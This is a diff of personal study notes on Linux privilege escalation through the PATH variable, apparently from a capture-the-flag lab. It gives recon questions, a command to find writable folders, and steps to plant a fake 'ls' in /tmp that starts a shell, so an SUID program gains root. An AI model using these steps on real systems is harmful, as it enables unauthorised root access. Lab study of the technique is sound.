RHernandez44/CommandNotes/Cmd Line/Privilege Escalation.md

 ## Exploiting PATH Variable

+Typically the PATH will look like this: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

+If we type “thm” to the command line, these are the locations Linux will look in for an executable called thm.

 view the Path of the relevant user `echo $PATH`

+1. What folders are located under $PATH
+2. Does your current user have write privileges for any of these folders?
+3. Can you modify $PATH?
+4. Is there a script/application you can start that will be affected by this vulnerability?

+### Exploit Steps

-1. find a program that runs an SUID binary such as `ls` or `curl`
+1. find a program that runs an SUID binary such as `ls` or `curl` using
+2. use `find / -writable 2>/dev/null | cut -d "/" -f 2,3 | sort -u` to find writable folders
-2. create an imitation executable
+1. create an imitation executable in a writable folder `cd /tmp`
-`cd /tmp`
 `echo "/bin/bash" > ls`
 `chmod +x ls`